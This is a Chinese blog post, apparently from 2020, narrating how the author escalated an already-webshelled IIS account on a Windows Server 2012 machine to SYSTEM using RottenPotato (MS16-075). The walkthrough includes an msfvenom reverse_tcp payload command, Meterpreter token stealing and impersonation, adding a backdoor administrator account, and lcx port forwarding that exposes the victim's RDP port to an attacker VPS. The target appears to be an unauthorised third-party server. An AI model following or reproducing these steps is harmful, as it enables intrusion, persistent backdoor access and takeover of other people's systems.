記一次WindowsServer2012提權 - 爛土豆
阿新 • • 發佈:2020-05-30
Emm Shell都好久了 操 最近好鐵鐵又喊我來提
因為自己提權不怎麼會,最近學了一點 放了學就回家抓緊吃完飯開始提權了
期間感謝Gu表哥和丞相哥哥
此次主題:爛土豆
shell咋拿的 我也忘了 好像是新增友情連結那裡還是啥 不重要了
直接獲取shell後 先用systeminfo > 1.txt了一下 然後放到了 windows-exploit-suggester 裡跑了一下
出來了有這幾個
然後嘗試用MS16-075進行提權 emm 最後有點懵逼
沒咋搞懂
後來看一些文章 用到了爛土豆!! 我也直接上爛土豆了
先用msf獲取shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe > /tt.exe
然後msf再設定lhost lport run
打到shell
然後使用ms16-075
emm 簡單流程是這樣
先常規一波 getsystem !! 成功失敗
重頭戲 爛土豆
傳到目標伺服器上
我用的蟻劍
然後進去竊取令牌的模組
use incognito
list_tokens -u
IIS我們本來的許可權 很低!!
進入到那個檔案的目錄裡
執行他
execute -cH -f ./rottenpotato.exe
重新list_tokens -u
system出來了
然後impersonate_token "NT AUTHORITY\\SYSTEM"
綠了 綠了 成功system
加個使用者
加上administrator
net localgrouop Administrator diaomao /add
直接連3389並沒成功 拿出LCX埠轉發一下 !!! 令人氣憤的是 找了幾個lcx都不可以 最後還是找到了個能用的
vps端
lcx.exe -listen 51 5678
把51埠 轉到5678埠上
受害機
lcx.exe -slave VPS的IP 51 本地IP 3389
然後本地直接127.0.0.1:5678
成功拿捏